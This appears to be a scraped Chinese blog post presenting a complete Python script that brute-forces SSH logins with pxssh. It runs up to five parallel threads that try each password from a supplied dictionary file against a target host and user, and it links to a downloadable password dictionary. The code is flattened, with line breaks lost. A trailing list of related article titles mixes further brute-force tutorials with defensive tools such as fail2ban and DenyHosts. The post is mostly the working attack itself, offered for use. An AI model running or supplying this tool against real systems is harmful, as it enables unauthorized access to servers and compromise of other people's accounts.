Python之暴力破解SSH
密码字典下载:git@code.csdn.net:qq_21792169/dictionary.git
brute.py
#import pxssh
import optparse
import time
from threading import *
from pexpect import pxsshmaxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)Found = False
Fails = 0def connect(host, user, password, release):global Foundglobal Failstry:s = pxssh.pxssh()s.login(host, user, password)print '[+] Password Found: ' + passwordFound = Trueexcept Exception, e:if 'read_nonblocking' in str(e):Fails += 1time.sleep(5)connect(host, user, password, False)elif 'synchronize with original prompt' in str(e):time.sleep(1)connect(host, user, password, False)finally:if release: connection_lock.release()def main():parser = optparse.OptionParser('usage %prog '+\'-H <target host> -u <user> -F <password list>')parser.add_option('-H', dest='tgtHost', type='string',\help='specify target host')parser.add_option('-F', dest='passwdFile', type='string',\help='specify password file')parser.add_option('-u', dest='user', type='string',\help='specify the user')(options, args) = parser.parse_args()host = options.tgtHostpasswdFile = options.passwdFileuser = options.userif host == None or passwdFile == None or user == None:print parser.usageexit(0)fn = open(passwdFile, 'r')for line in fn.readlines():if Found:print "[*] Exiting: Password Found"exit(0)if Fails > 5:print "[!] Exiting: Too Many Socket Timeouts"exit(0)connection_lock.acquire()password = line.strip('\r').strip('\n')print "[-] Testing: "+str(password)t = Thread(target=connect, args=(host, user,\password, True))child = t.start()if __name__ == '__main__':main()
Python之暴力破解SSH相关推荐
- Freebsd 下用 sshguard 防止暴力破解 ssh 密码
2019独角兽企业重金招聘Python工程师标准>>> 在 Freebsd 控制台或用 dmesg -a 查看系统消息的时候会发现类似于下面的大量信息,这是因为有人在尝试暴力破解 S ...
- 第八天 02.hydra暴力破解ssh密码以及ftp密码
hydra暴力破解ssh密码 实验环境: windows7 ,kali 实验步骤: windows进入hydra目录 cd 命令 使用命令爆破SSH hydra -l 用户名 -p 密码字典 ss ...
- 使用Medusa美杜莎暴力破解SSH密码
使用Medusa美杜莎暴力破解SSH密码 1.Medusa简介 Medusa(美杜莎)是一个速度快,支持大规模并行,模块化的爆力破解工具.可以同时对多个主机,用户或密码执行强力测试.Medusa和hy ...
- Python攻防-暴力破解ZIP加密文件的密码
文章目录 前言 Python语法 自定义迭代器 Python多线程 Python脚本 单线程数字爆破 单线程字符爆破 多线程字典爆破 总结 前言 本文继续记录学习下 Python 的有趣应用:借助 P ...
- Python:暴力破解密码 - 压缩包、web实战
简介:常规情况下,由于web自身的服务资源,带宽,吞吐率的原因,存在访问上线的情况,这和极端情况下本地直接即时访问,即时反馈的机制是完全不可等同的.另外暴力破解密码这种行为本身就是一个徘徊为灰色地带的 ...
- python脚本-暴力破解无线网弱密码
关注我的博客,访问更多内容! 背景:学校最近重新架设无线网一体化,而初始密码为弱密码(6位数字),下面我们要做的就是通过暴力破解的方式破解弱密码!(所以建议大家以后无论是在注册还是什么情况,都千万不要 ...
- DenyHosts教程:防暴力破解SSH密码
背景 此前服务器多次被恶意挖矿,我们通过下面的命令搜索SSH远程登录日志,发现攻击者的IP尝试登录了200多次,即暴力破解了被攻击用户的密码.通过询问该用户得知,设置的密码确实比较简单,为了防止后面被 ...
- Linux 利用hosts.deny 防止暴力破解ssh
一.ssh暴力破解 利用专业的破解程序,配合密码字典.登陆用户名,尝试登陆服务器,来进行破解密码,此方法,虽慢,但却很有效果. 二.暴力破解演示 2.1.基础环境:2台linux主机(centos 7 ...
- 使用fail2ban防止暴力破解ssh及vsftpd密码
介绍 此文介绍一个linux下通过监控日志防止密码被暴力破解的软件-fail2ban.fail2ban支持常用的服务,如sshd, apache, qmail, proftpd, sasl, aste ...
最新文章
- [原创]Javascript类成员的作用域
- 华为java安全编码规范_Java安全编码之SQL注入
- 判断是不是一个数组?
- Openstack_通用技术_RPC 远程异步调用
- rest_framework11:jwt简单例子/自定制基于jwt认证类
- 2-Second Scrum Meeting-20151202
- mybatis依赖_这大概就是公司一直用Mybatis的原因!真的太强了
- ajax方式表单拦截
- Intel Core Enhanced Core架构/微架构/流水线 (10) - 先进存储器访问
- 基于贪心算法的几类区间覆盖问题 nyoj 12喷水装置(二) nyoj 14会场安排问题...
- 面经——算法题数据输入输出
- 数组的普通查找与折半查找
- libiconv android编译,NDK编译经常使用开源库-libiconv
- C语言sar图像几何校正,SAR图像几何校正方法与流程
- 像素越多越好?像元的面积越小越好?为何底大一级压死人?
- 想成为华为hcie网络工程师一定鸦知道的MSDP 基本介绍
- 使用html制作圆弧正方形,CSS3圆角效果:从圆出发
- 5064. 删除字符串中的所有相邻重复项
- P2184 贪婪大陆 线段树(优化:区间修改变为单点修改)
- Excel如何将中文快速翻译?
热门文章
- linux系统停留在登入界面,登入失败问题
- 宗镜录略讲——南怀瑾老师——系列11
- JAVA-TOMCAT环境变量的设置方法
- 【XJTUSE 计算机组成与结构笔记】第十三章 精简指令集计算机
- 计算机 开机硬盘灯一直亮,电脑一开机硬盘灯就一直亮
- mysql数据库date_format函数格式化时间
- bps pps fps的定义
- 如何用阿里iconfont,在伪元素选择器content:‘‘中添加文字标签
- 一句话理解:谐振腔工作原理
- 【新媒体 | 自媒体 运营】虚拟素材(图片,字体,音频,视频)商用及CC版权相关问题